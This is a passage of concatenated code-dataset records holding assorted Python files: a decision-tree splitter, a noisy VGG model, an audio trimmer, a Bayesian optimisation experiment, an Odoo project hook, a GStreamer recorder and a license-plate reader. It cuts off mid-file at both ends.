i.ranges[k]\n                print(k + 1, \"  x.n\\t\" + str(x.count) + \" | x.lo \\t\" + str(\n                    round(x.lo, 5)) + \" | x.hi \\t\" + str(\n                    round(x.hi, 5)) + \" | y.lo \\t\" + str(round(y.lo, 5)) + \" | y.hi \\t\" + str(round(y.hi, 5)))\n        else:\n            print(\"\\nPart 2:\")\n            for k in range(len(i.ranges)):\n                x = i.xranges[k]\n                y = i.ranges[k]\n                print(k + 1, \"  x.n\\t\" + str(x.count) + \" | x.lo \\t\" + str(\n                    round(x.lo, 5)) + \" | x.hi \\t\" + str(\n                    round(x.hi, 5)) + \"  | y.mode \\t\" + str(y.mode) + \" | y.ent \\t \" + str(round(y.sd, 5)))\n\n    def __divide(i, lo, hi, b4, rank):\n\n        \"Find a split between lo and hi, then recurse on each split.\"\n\n        if i.yis == \"Num\":\n            l = i.xis([])\n            r = i.xis(i._lst[lo:hi])\n            i.stop = last(b4.numList)\n            i.start = first(b4.numList)\n        else:\n            l = i.symSplit([])\n            r = i.symSplit(i._lst[lo:hi])\n            i.stop = last(b4.symList)\n            i.start = first(b4.symList)\n        i.epsilon = b4.sd * THE.div.cohen\n        best = b4.sd\n        cut = None\n        for j in range(lo, hi):\n            if i.yis == \"Num\":\n                print(i._lst[j])\n                l.num2(i._lst[j])\n                r.numLess2(0)\n                print(r.numList)\n            else:\n                l.Sym2(i._lst[j])\n                r.symLess(i._lst[j])\n\n            if l.count >= i.step:\n                if r.count >= i.step:\n                    now = i._lst[j - 1]\n                    after = i._lst[j]\n                    if now == after: continue\n                    if i.yis == \"Num\":\n                        if abs(r.mu - l.mu) >= i.epsilon:\n                            if after - i.start >= i.epsilon:\n                                if i.stop - now >= i.epsilon:\n                                    xpect = l.xpect(r)\n                                    if xpect * THE.div.trivial < best:\n                                        best, cut = xpect, j\n                    else:\n                        if abs(ord(l.mode) - ord(r.mode)) >= i.epsilon:\n                            if ord(after) - ord(i.start) >= i.epsilon:\n                                if ord(i.stop) - ord(now) >= i.epsilon:\n                                    xpect = l.xpect(r)\n                                    if xpect * THE.div.trivial < best:\n                                        best, cut = xpect, j\n        if cut:\n            ls, rs = i._lst[lo:cut], i._lst[cut:hi]\n            if i.yis == \"Num\":\n                rank = i.__divide(lo, cut, i.xis(ls), rank)[0] + 1\n                rank = i.__divide(cut, hi, i.xis(rs), rank)[0]\n            else:\n                rank = i.__divide(lo, cut, i.symSplit(ls), rank)[0] + 1\n                rank = i.__divide(cut, hi, i.symSplit(rs), rank)[0]\n        else:\n            i.gain += b4.count * b4.sd\n            b4.rank = rank\n            i.ranges += [b4]\n        return rank, cut, best\n","sub_path":"hw/6/div.py","file_name":"div.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"459819718","text":"'''VGG11/13/16/19 in Pytorch.\n\nWe perturb the weight and bias parameters for convolutional, linear and batch\nnormalization layers.\n\n'''\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn.modules.utils import _pair\n\ncfg = {\n    'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n    'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512,\n              512, 'M'],\n    'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512,\n              'M', 512, 512, 512, 'M'],\n    'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512,\n              512, 512, 'M', 512, 512, 512, 512, 'M'],\n}\n\n\ndef perturb_param(param, param_noise, buffer_noise):\n    if param_noise > 0:\n        buffer_noise.normal_(0, param_noise)\n    return param + buffer_noise\n\n\nclass LinearNoise(nn.Linear):\n    \"\"\"\n    For the linear layer we perturb the weights and the additive bias.\n    \"\"\"\n\n    def __init__(self, in_features, out_features, bias=True,\n                 param_noise=0.04):\n        super(LinearNoise, self).__init__(in_features=in_features,\n                                          out_features=out_features,\n                                          bias=bias)\n        self.param_noise = param_noise\n        self.buffer_weight_noise = None\n\n    def forward(self, input):\n        if self.buffer_weight_noise is None:\n            self.buffer_weight_noise = torch.zeros_like(\n                self.weight, requires_grad=False)\n            if self.param_noise > 0:\n                self.buffer_weight_noise.normal_(\n                    0, self.param_noise).to(self.weight.device)\n        weight = perturb_param(param=self.weight,\n                               param_noise=self.param_noise,\n                               buffer_noise=self.buffer_weight_noise)\n        return F.linear(input, weight, self.bias)\n\n\nclass BatchNorm2dNoise(nn.BatchNorm2d):\n    def __init__(self, num_features,\n                 param_noise=0.04):\n        super(BatchNorm2dNoise, self).__init__(num_features=num_features)\n        self.param_noise = param_noise\n        self.buffer_weight_noise = None\n\n    def forward(self, input):\n        self._check_input_dim(input)\n\n        if self.buffer_weight_noise is None:\n            self.buffer_weight_noise = torch.zeros_like(\n                self.weight, requires_grad=False)\n            if self.param_noise > 0:\n                self.buffer_weight_noise.normal_(\n                    0, self.param_noise).to(self.weight.device)\n        weight = perturb_param(param=self.weight,\n                               param_noise=self.param_noise,\n                               buffer_noise=self.buffer_weight_noise)\n        # exponential_average_factor is set to self.momentum\n        # (when it is available) only so that if gets updated\n        # in ONNX graph when this node is exported to ONNX.\n        if self.momentum is None:\n            exponential_average_factor = 0.0\n        else:\n            exponential_average_factor = self.momentum\n\n        if self.training and self.track_running_stats:\n            # TODO: if statement only here to tell the jit to skip emitting this when it is None\n            if self.num_batches_tracked is not None:\n                self.num_batches_tracked += 1\n                if self.momentum is None:  # use cumulative moving average\n                    exponential_average_factor = 1.0 / float(\n                        self.num_batches_tracked)\n                else:  # use exponential moving average\n                    exponential_average_factor = self.momentum\n\n        return F.batch_norm(\n            input, self.running_mean, self.running_var, weight, self.bias,\n            self.training or not self.track_running_stats,\n            exponential_average_factor, self.eps)\n\n\nclass VGG(nn.Module):\n    def __init__(self, vgg_name, param_noise=0.04):\n        super(VGG, self).__init__()\n        self.param_noise = param_noise\n        self.classifier = LinearNoise(512, 10, param_noise=self.param_noise)\n        self.features = self._make_layers(cfg[vgg_name])\n\n    def forward(self, x):\n        out = self.features(x)\n        out = out.view(out.size(0), -1)\n        out = self.classifier(out)\n        return out\n\n    def _make_layers(self, cfg):\n        layers = []\n        in_channels = 3\n        for i, x in enumerate(cfg):\n            if x == 'M':\n                layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n            else:\n                layers += [\n                    nn.Conv2d(in_channels, x, kernel_size=3, padding=1),\n                    BatchNorm2dNoise(x, param_noise=self.param_noise),\n                    nn.ReLU(inplace=True)]\n                in_channels = x\n        layers += [nn.AvgPool2d(kernel_size=1, stride=1)]\n        return nn.Sequential(*layers)\n\n# net = VGG('VGG11')\n# x = torch.randn(2,3,32,32)\n# print(net(Variable(x)).size())\n","sub_path":"cnns/nnlib/pytorch_architecture/vgg_perturb_fc_bn.py","file_name":"vgg_perturb_fc_bn.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"548269721","text":"from pydub import AudioSegment\nfrom scipy.io.wavfile import write\nimport numpy as np\nimport sys\n\n\naudio_path = sys.argv[1]\nnew_audio_path = sys.argv[2]\naudio_format = \"wav\"\n\n\ndef detect_leading_silence(sound, silence_threshold=-50.0, chunk_size=10):\n    trim_ms = 0  # ms\n\n    assert chunk_size > 0  # to avoid infinite loop\n    while sound[\n        trim_ms : trim_ms + chunk_size\n    ].dBFS < silence_threshold and trim_ms < len(sound):\n        trim_ms += chunk_size\n\n    return trim_ms\n\n\nsound = AudioSegment.from_file(audio_path, format=audio_format)\n\nstart_trim = detect_leading_silence(sound)\nend_trim = detect_leading_silence(sound.reverse())\n\nduration = len(sound)\ntrimmed_sound = sound[start_trim : duration - end_trim]\n\ntrimmed_sound.export(new_audio_path, format=audio_format)\n\n","sub_path":"removeSilence.py","file_name":"removeSilence.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"478212367","text":"# %% [markdown]\n# ## Using non-linear inequality constraints in Ax\n# This notebook comes with the following caveats:\n# 1. The search space has to be [0, 1]^d\n# 2. We need to pass in explicit `batch_initial_conditions` that satisfy the non-linear inequality constraints as starting points for optimizing the acquisition function.\n# 3. BATCH_SIZE must be equal to 1.\n\n# %%\nfrom copy import copy\nfrom os.path import join\nfrom pathlib import Path\nimport random\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport torch\n\nfrom botorch.acquisition import ExpectedImprovement\nfrom botorch.fit import fit_gpytorch_model\nfrom botorch.models import SingleTaskGP\nfrom botorch.models.transforms import Standardize\nfrom gpytorch.mlls import ExactMarginalLogLikelihood\nfrom torch.nn.functional import normalize\n\nfrom ax import (\n    Data,\n    Experiment,\n    ParameterType,\n    RangeParameter,\n    SearchSpace,\n    SumConstraint,\n)\n\nfrom ax.storage.json_store.save import save_experiment\n\n# %%\nfrom ax.core.objective import Objective\nfrom ax.core.optimization_config import OptimizationConfig\nfrom utils.extraordinary import extraordinary_probability\n\nfrom utils.metrics import CrabNetMetric\nfrom utils.search import search_space\n\n# from ax.utils.measurement.synthetic_functions import Hartmann6\nfrom ax.modelbridge.registry import Models\nfrom ax.runners.synthetic import SyntheticRunner\nfrom torch.quasirandom import SobolEngine\n\nfrom utils.sobol_candidates import nchoosek_sobol\n\ndummy = False\n\nresult_dir = \"results\"\nPath(result_dir).mkdir(exist_ok=True)\n\nnoise_sd = 0.1\nsynth_dither = 0.1\nsem = None\n\nd = 5  # HARD-CODED PARAMETER, i.e. 5 + 1 = 6 for Hartmann6Metric\nparam_names = [f\"x{i}\" for i in range(d + 1)]\nsubparam_names = param_names[:-1]  # sub-parameter names (i.e. all but last component)\nparams = [\n    RangeParameter(\n        name=parameter_name, parameter_type=ParameterType.FLOAT, lower=0.0, upper=1.0,\n    )\n    for parameter_name in subparam_names\n]\n\nmetric = CrabNetMetric(name=\"objective\")\noptimization_config = OptimizationConfig(\n    objective=Objective(metric=metric, minimize=True,)\n)\n\n# %% Let's see how we do via a brute force search\nif dummy:\n    comb_m = 10\nelse:\n    comb_m = 18\ncandidates = nchoosek_sobol(\n    param_names, n_slots=3, comb_m=comb_m, fixed_compositions=False\n)\nprint(f\"{len(candidates)} SOBOL candidates generated\")\n# compute the dither all at once, and add it to hartmann6 to get \"true\" fn\ndither = metric.interp(candidates)\nnoise_free = metric.f_without_dither\nys = [noise_free(x) for x in candidates.values[:, :5]]\nys = np.array(ys) + dither\nidx = np.argmin(ys)\nprint(f\"minimum estimated via SOBOL search with true values: {ys[idx]:.4f}\")\nx_opt = candidates.iloc[idx]\n\n# probability of finding a candidate within some percent of the estimated optimum\nys_noise = ys + noise_sd * np.random.randn(len(ys))\n# for seemingly extraordinary candidates, do repeats to verify (i.e. with true values)\n# mn = min(ys)\n# mx = max(ys)\nmn = -1.484  # as estimated by SAASBO\nprint(f\"minimum estimated previously by SAASBO: {mn:.3f}\")\nmx = 0.0\nthresh = 0.10  # i.e. within 10% of optimum\n\nextraordinary_probability(ys, ys_noise, mx=mx, mn=mn, thresh=thresh)\n\n# %% [markdown]\n# We want to optimize $f_{\\text{hartmann6}}(x)$ subject to an additional constraint $|| x ||_0 <= 3$.\n#\n# This constraint isn't differentiable, but it can be approximated by a differentiable relaxation using a sum of narrow Gaussian basis functions.\n# Given a univariate Gaussian basis function $g_{\\ell}(x)$ centered at zero with $\\ell > 0$ small,\n# we can approximate the constraint by: $|| x ||_0 \\approx 6 - \\sum_{i=1}^6 g_{\\ell}(x_i) \\leq 3$, which reduces to $\\sum_{i=1}^6 g_{\\ell}(x_i) \\geq 3$.\n\n# %%\ndef narrow_gaussian(x, ell):\n    return torch.exp(-0.5 * (x / ell) ** 2)\n\n\ndef ineq_constraint(x, ell=1e-3):\n    # Approximation of || x ||_0 <= 3. The constraint is >= 0 to conform with SLSQP\n    return narrow_gaussian(x, ell).sum(dim=-1) - 3\n\n\n# %% [markdown]\n# ## BO-loop\n\n# %%\ndef get_batch_initial_conditions(n, X, Y, raw_samples):\n    \"\"\"Generate starting points for the acquisition function optimization.\"\"\"\n    # 1. Draw `raw_samples` Sobol points and randomly set three parameters to zero to satisfy the constraint\n    X_cand = SobolEngine(dimension=d, scramble=True).draw(raw_samples)\n    X_cand = normalize(X_cand).to(torch.double)\n    inds = torch.argsort(torch.rand(raw_samples, d), dim=-1)[:, :3]\n    X_cand[torch.arange(X_cand.shape[0]).unsqueeze(-1), inds] = 0\n\n    # 2. Fit a GP to the observed data, the right thing to do is to use the Ax model here\n    gp = SingleTaskGP(X, Y, outcome_transform=Standardize(m=1))\n    mll = ExactMarginalLogLikelihood(gp.likelihood, gp)\n    fit_gpytorch_model(mll)\n\n    # 3. Use EI to select the best points. Ideally, we should use the Ax acquisition function here as well\n    EI = ExpectedImprovement(model=gp, best_f=Y.min(), maximize=False)\n    X_cand = X_cand.unsqueeze(1)\n    acq_vals = EI(X_cand)\n    return X_cand[acq_vals.topk(n).indices]\n\n\n# %%\nBATCH_SIZE = 1\nif dummy:\n    N_INIT = 5\n    N_BATCHES = 2\nelse:\n    N_INIT = 10\n    N_BATCHES = 90\nprint(f\"Doing {N_INIT + N_BATCHES * BATCH_SIZE} evaluations\")\n\n# %%\n# Experiment\nexperiment = Experiment(\n    name=\"saasbo_experiment\",\n    search_space=search_space,\n    optimization_config=optimization_config,\n    runner=SyntheticRunner(),\n)\n\n# Initial Sobol points (set three random parameters to zero)\nsobol = Models.SOBOL(search_space=experiment.search_space)\nfor _ in range(N_INIT):\n    trial = sobol.gen(1)\n    keys = copy(subparam_names)\n    random.shuffle(keys)\n    for k in keys[:3]:\n        trial.arms[0]._parameters[k] = 0.0\n    experiment.new_trial(trial).run()\n\n# Run SAASBO\ndata = experiment.fetch_data()\nfor i in range(N_BATCHES):\n    model = Models.FULLYBAYESIAN(\n        experiment=experiment,\n        data=data,\n        num_samples=256,  # Increasing this may result in better model fits\n        warmup_steps=512,  # Increasing this may result in better model fits\n        gp_kernel=\"matern\",  # \"rbf\" is the default in the paper, but we also support \"matern\"\n        torch_dtype=torch.double,\n        verbose=False,  # Set to True to print stats from MCMC\n        disable_progbar=True,  # Set to False to print a progress bar from MCMC\n    )\n    batch_initial_conditions = get_batch_initial_conditions(\n        n=20, X=model.model.Xs[0], Y=model.model.Ys[0], raw_samples=1024\n    )\n    with warnings.catch_warnings():\n        warnings.simplefilter(\"ignore\")  # Filter SLSQP warnings\n        generator_run = model.gen(\n            BATCH_SIZE,\n            model_gen_options={\n                \"optimizer_kwargs\": {\n                    \"linear_constraints\": [\n                        (torch.arange(d), torch.ones(d), 1)\n                    ],  # sum(x[:-1]) <= 1\n                    \"nonlinear_inequality_constraints\": [ineq_constraint],\n                    \"batch_initial_conditions\": batch_initial_conditions,\n                }\n            },\n        )\n\n    trial = experiment.new_batch_trial(generator_run=generator_run)\n    for arm in trial.arms:\n        arm._parameters = {k: 0.0 if v < 1e-3 else v for k, v in arm.parameters.items()}\n        assert sum([v > 1e-3 for v in arm.parameters.values()]) <= 3\n    trial.run()\n    data = Data.from_multiple_data([data, trial.fetch_data()])\n\n    fetched_data = trial.fetch_data()\n    new_value = fetched_data.df[\"mean\"].min()\n    # best_value = fetched_data.true_df[\"mean\"].min()\n    best_value = data.df[\"mean\"].min()\n\n    arm_parameters = [arm.parameters for arm in list(experiment.arms_by_name.values())]\n    arm_params = pd.DataFrame(arm_parameters).values\n    y_true = np.array([metric.f(v) for v in arm_params])\n    best_true_val = min(y_true)\n    print(\n        f\"Iteration: {i}, Best in iteration {new_value:.3f}, \",\n        f\"Best so far: {best_value:.3f}, \",\n        f\"Best true so far: {best_true_val:.3f}\",\n    )\n\n# %%\npd.options.display.float_format = \"{:,.3f}\".format\ndf = pd.DataFrame(arm_parameters)\ndf[\"x5\"] = np.round(1 - df.values.sum(axis=1), decimals=6)\ny_pred = data.df[\"mean\"]\ndf[\"y_pred\"] = y_pred\ndf[\"y_true\"] = y_true\nprint(df)\n\n# y_pred = df[]\nextraordinary_probability(y_true, y_pred, mx=mx, mn=mn)\n\nexperiment_dir = result_dir\nif dummy:\n    experiment_dir = join(\"dummy\", experiment_dir)\nexperiment_dir = join(\n    experiment_dir,\n    \"experiments\",\n    f\"{experiment.name}\",\n    f\"N_INIT_{N_INIT}_BATCH_SIZE_{BATCH_SIZE}_N_BATCHES_{N_BATCHES}\",\n)\nPath(experiment_dir).mkdir(exist_ok=True, parents=True)\nexperiment_fpath = join(experiment_dir, \"experiment.json\")\nsave_experiment(experiment, experiment_fpath)\n\ndf.to_csv(join(experiment_dir, \"results.csv\"))\n","sub_path":"comp_saas.py","file_name":"comp_saas.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"551523649","text":"import sys\n# locate other code files\nsys.path.append(\"../..\")\n\nimport numpy as np\nfrom solve import *\nfrom gen_data import make_data\nfrom printer import create_anim\n\nname = \"c_poly\"\ny_coords = np.linspace(-2, 2, 5)\nvar_vals = np.linspace(0.5, 1, 3)\nparams = np.arange(2, 6)\nslacks = np.logspace(-1, 7, 10)\nseed = 5\n\ncounter = 0\nK = len(y_coords)*len(var_vals)*len(params)*len(slacks)\nfor k in range(len(params)):\n    anim_files = [\"\"]*len(y_coords)*len(var_vals)\n    for i in range(len(var_vals)):\n        for j in range(len(y_coords)):\n            for c in range(len(slacks)):\n                Ns = [10, 10, 20]\n                points = np.array([(-2, 0), (2, 0), (0, y_coords[j])])\n                vars = np.array([var_vals[i]]*3)\n                classes = np.array([1, 1, -1])\n\n                make_data(Ns, points, vars, classes, out=\"test\", seed=seed)\n                anim_file = \"{}{}.jpg\".format(name, counter)\n                title = \"Var={:0.3f}, param={}, slack={:0.3f}\".format(var_vals[i], params[k], slacks[c])\n                solve(\"test.npz\", kern_type=\"poly\", kern_param=params[k], out=anim_file, plot=False, title=title, slack=slacks[c])\n                anim_files[j] = anim_file\n                counter += 1\n                print(\"image {}/{}\".format(counter, K))\n    # print(\"creating animation\")\n    # create_anim(anim_files, out=\"anim_p{}.mp4\".format(params[k]), duration=0.4)\n","sub_path":"support vector machines/moving_clusters_slack/poly/generate_poly.py","file_name":"generate_poly.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"329972871","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass account_analytic_account_improvements(models.Model):\n    _inherit = 'account.analytic.account'\n\n    first_subscription_id = fields.Many2one(comodel_name='sale.subscription', string=\"Subscription\", compute='_compute_first_subscription')\n\n    @api.one\n    def _compute_first_subscription(self):\n        if self.subscription_ids and len(self.subscription_ids) > 0 :\n            self.first_subscription_id = self.subscription_ids[0]\n\n    @api.cr_uid_id_context\n    def project_create(self, cr, uid, analytic_account_id, vals, context=None):\n        \n        project_id = super(account_analytic_account_improvements, self).project_create(cr, uid, analytic_account_id, vals, context=context)\n        if project_id != False:\n            \n            project_project_obj = self.pool.get('project.project')\n            project_project = project_project_obj.browse(cr, uid, project_id)\n\n            analytic_account_obj = self.pool.get('account.analytic.account')\n            analytic_account = analytic_account_obj.browse(cr, uid, analytic_account_id)\n\n            if analytic_account.first_subscription_id:\n                \n                project_template_id = analytic_account.first_subscription_id.template_id.project_id if analytic_account.first_subscription_id.template_id else False\n                if project_template_id != False:\n\n                    #Sets the project attributes\n                    project_project.write({\n                            'name': \"%s - %s\" % (project_template_id.name, analytic_account.first_subscription_id.partner_id.name),\n                            'partner_id': analytic_account.first_subscription_id.partner_id.id,\n                            'user_id': project_template_id.user_id.id,\n                            'color': project_template_id.color,\n                            'privacy_visibility': project_template_id.privacy_visibility,\n                        })\n\n                    #Adds the team users from the analytic account in the project team\n                    #-----------------------------------------------------------------\n\n                    #if project_project.analytic_account_id.contract_team:\n                    #    for user in project_project.analytic_account_id.contract_team.users:\n                    #        query = \"\"\"\n                    #                INSERT INTO project_user_rel (uid, project_id)\n                    #                VALUES (%s,%s)\n                    #                \"\"\"\n                    #        cr.execute(query, (str(user.id),str(project_id)))\n\n\n                    #Attributes in page \"Other Info\"\n                    #-------------------------------\n                    \n                    #project_project.date_start = project_project.analytic_account_id.date_start\n                    #project_project.date = project_project.analytic_account_id.date\n                    #project_project.project_escalation_id = project_project_template.project_escalation_id.id\n\n                    #Sets the project stages\n                    #-----------------------\n                    #Removes the old project stages\n                    query = \"\"\"\n                            DELETE FROM project_task_type_rel\n                            WHERE project_id=%s\n                            \"\"\"\n                    cr.execute(query, [str(project_id)])\n\n                    #Adds the new project stages from the project template\n                    for stage in project_template_id.type_ids:\n                        query = \"\"\"\n                                INSERT INTO project_task_type_rel (type_id, project_id)\n                                VALUES (%s,%s)\n                                \"\"\"\n                        cr.execute(query, (str(stage.id),str(project_id)))\n\n\n                    #removes the project followers\n                    #query = \"\"\"\n                    #        DELETE FROM mail_followers\n                    #        WHERE res_id=%s and res_model=%s\n                    #        \"\"\"\n                    #cr.execute(query, (str(project_id), 'project.issue'))\n        \n        return project_id\n","sub_path":"account_analytic_account_improvements/models/account_analytic_account.py","file_name":"account_analytic_account.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"138520614","text":"#!/usr/bin/python\n\nfrom Cocoa import *\nfrom Foundation import *\n\ntxt = NSString.stringWithFormat_(\"Hello %@\", \"world\")\nfontSize = 13.0\ntxtColor = NSColor.blackColor()\ntxtAttr = NSDictionary.dictionaryWithObjectsAndKeys_(\n  NSFont.systemFontOfSize_(fontSize), NSFontAttributeName,\n  txtColor, NSForegroundColorAttributeName\n  )\n\n# NSLog(\"[Pass]\")","sub_path":"Python.py","file_name":"Python.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"81504527","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 23 23:33:24 2021\n\n@author: admin\n\"\"\"\n\n#pascal triangle\nn = int(input(\"n value? \"))\nst=\" \"\nmain = []\nls = [1]\nls1 = [1]\nls2 = [1,1]\nmain.append(ls1)\nmain.append(ls2)\nfor j in range(n-2):\n    for i in range(len(ls2)-1):\n        result = ls2[i]+ls2[i+1]\n        ls.append(result)\n       \n    \n    ls.append(1)\n    main.append(ls)\n    ls2=ls\n    ls = [1]\n    \n \n\nfor x in range(1,n+1):\n    print((n-x)*st,main[x-1])","sub_path":"projects/Pascal Triangle.py","file_name":"Pascal Triangle.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"386409249","text":"#!/usr/bin/python3\n# This program is licensed under GPLv3.\nfrom os import path\nimport gi\ngi.require_version('Gst', '1.0')\ngi.require_version('Gtk', '3.0')\ngi.require_version('GdkX11', '3.0')\ngi.require_version('GstVideo', '1.0')\nfrom gi.repository import GObject, Gst, Gtk\n\n# Needed for get_xid(), set_window_handle()\nfrom gi.repository import GdkX11, GstVideo\n\n# Needed for timestamp on file output\nfrom datetime import datetime\nGObject.threads_init()\nGst.init(None)\nlocation = '/dev/video0'\n\nclass Player(Gtk.Window):\n    def __init__(self):\n        Gtk.Window.__init__(self, title=\"Liveview\")\n        self.connect('destroy', self.quit)\n        self.set_default_size(800, 450)\n\n        # Create DrawingArea for video widget\n        self.drawingarea = Gtk.DrawingArea()\n\n        # Create a grid for the DrawingArea and buttons\n        grid = Gtk.Grid()\n        self.add(grid)\n        grid.attach(self.drawingarea, 0, 1, 2, 1)\n        # Needed or else the drawing area will be really small (1px)\n        self.drawingarea.set_hexpand(True)\n        self.drawingarea.set_vexpand(True)\n\n        # Quit button\n        quit = Gtk.Button(label=\"Quit\")\n        quit.connect(\"clicked\", Gtk.main_quit)\n        grid.attach(quit, 0, 0, 1, 1)\n\n        # Record/Stop button\n        self.record = Gtk.Button(label=\"Record\")\n        self.record.connect(\"clicked\", self.record_button)\n        grid.attach(self.record, 1, 0, 1, 1)\n\n        # Create GStreamer pipeline\n        self.pipeline = Gst.parse_launch(\"v4l2src device=\" + location + \" ! tee name=tee ! queue name=videoqueue ! deinterlace ! xvimagesink\")\n\n        # Create bus to get events from GStreamer pipeline\n        bus = self.pipeline.get_bus()\n        bus.add_signal_watch()\n        bus.connect('message::eos', self.on_eos)\n        bus.connect('message::error', self.on_error)\n\n        # This is needed to make the video output in our DrawingArea:\n        bus.enable_sync_message_emission()\n        bus.connect('sync-message::element', self.on_sync_message)\n\n    def run(self):\n        self.show_all()\n        self.xid = self.drawingarea.get_property('window').get_xid()\n        self.pipeline.set_state(Gst.State.PLAYING)\n        Gtk.main()\n\n    def quit(self, window):\n        self.pipeline.set_state(Gst.State.NULL)\n        Gtk.main_quit()\n\n    def on_sync_message(self, bus, msg):\n        if msg.get_structure().get_name() == 'prepare-window-handle':\n            print('prepare-window-handle')\n            msg.src.set_window_handle(self.xid)\n\n    def on_eos(self, bus, msg):\n        print('on_eos(): seeking to start of video')\n        self.pipeline.seek_simple(\n            Gst.Format.TIME,\n            Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,\n            0\n        )\n\n    def on_error(self, bus, msg):\n        print('on_error():', msg.parse_error())\n\n    def start_record(self):\n        # Filename (current time)\n        filename = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\") + \".avi\"\n        print(filename)\n        self.recordpipe = Gst.parse_bin_from_description(\"queue name=filequeue ! jpegenc ! avimux ! filesink location=\" + filename, True)\n        self.pipeline.add(self.recordpipe)\n        self.pipeline.get_by_name(\"tee\").link(self.recordpipe)\n        self.recordpipe.set_state(Gst.State.PLAYING)\n\n    def stop_record(self):\n        filequeue = self.recordpipe.get_by_name(\"filequeue\")\n        filequeue.get_static_pad(\"src\").add_probe(Gst.PadProbeType.BLOCK_DOWNSTREAM, self.probe_block)\n        self.pipeline.get_by_name(\"tee\").unlink(self.recordpipe)\n        filequeue.get_static_pad(\"sink\").send_event(Gst.Event.new_eos())\n        print(\"Stopped recording\")\n\n    def record_button(self, widget):\n        if self.record.get_label() == \"Record\":\n            self.record.set_label(\"Stop\")\n            self.start_record()\n        else:\n            self.stop_record()\n            self.record.set_label(\"Record\")\n\n    def probe_block(self, pad, buf):\n        print(\"blocked\")\n        return True\n\np = Player()\np.run()\n","sub_path":"python/gst-camera-record.py","file_name":"gst-camera-record.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"300551341","text":"# Copyright (c) 2019, RangerUFO\n#\n# This file is part of alpr_utils.\n#\n# alpr_utils is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# alpr_utils is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with alpr_utils.  If not, see .\n\nimport time\nimport mxnet as mx\nimport matplotlib.pyplot as plt\nfrom gluoncv import model_zoo, data\nimport cv2\nfrom read_plate import ReadPlate\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy\nfrom utils.drawchinese import DrawChinese\n\n\ndef load_image(path):\n    with open(path, \"rb\") as f:\n        buf = f.read()\n    return mx.image.imdecode(buf)\n\n\ndef fixed_crop(raw, bbox):\n    x0 = max(int(bbox[0].asscalar()), 0)\n    x0 = min(int(x0), raw.shape[1])\n    y0 = max(int(bbox[1].asscalar()), 0)\n    y0 = min(int(y0), raw.shape[0])\n    x1 = max(int(bbox[2].asscalar()), 0)\n    x1 = min(int(x1), raw.shape[1])\n    y1 = max(int(bbox[3].asscalar()), 0)\n    y1 = min(int(y1), raw.shape[0])\n    return mx.image.fixed_crop(raw, x0, y0, x1 - x0, y1 - y0)\n\n\ndef test(images):\n    context = mx.cpu(0)\n    yes = 0\n    count = 0\n    yesss = 0\n    yolo = model_zoo.get_model('yolo3_darknet53_voc', pretrained=True, ctx=context)\n    read_plate = ReadPlate()\n    for path in images:\n\n        label = path.split('/')[-1].split('_')[0]\n        # print(label)\n        # exit()\n        '''加载图片'''\n        raw = load_image(path)\n        # print(raw.shape)\n        ts = time.time()\n        # print('aaaaaaaaaaaaa')\n        '''图片归一化'''\n        x, _ = data.transforms.presets.yolo.transform_test(raw, short=512)\n        # print(x)\n        '''得到侦测结果'''\n        classes, scores, bboxes = yolo(x.as_in_context(context))\n        # print(classes.shape)\n        '''反算回归框'''\n        bboxes[0, :, 0::2] = bboxes[0, :, 0::2] / x.shape[3] * raw.shape[1]\n        bboxes[0, :, 1::2] = bboxes[0, :, 1::2] / x.shape[2] * raw.shape[0]\n        vehicles = [\n            fixed_crop(raw, bboxes[0, i]) for i in range(classes.shape[1])\n            if (yolo.classes[int(classes[0, i].asscalar())] == 'car' or\n                yolo.classes[int(classes[0, i].asscalar())] == 'bus') and\n               scores[0, i].asscalar() > 0.5\n        ]\n        # print(vehicles)\n        # exit()\n        # print(\"yolo profiling: %f\" % (time.time() - ts))\n        for i, raw in enumerate(vehicles):\n            # print(\"vehicle[%d]:\" % i)\n            # print(raw)\n            image = raw.asnumpy()\n            image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n            # cv2.imshow('a', image)\n            # 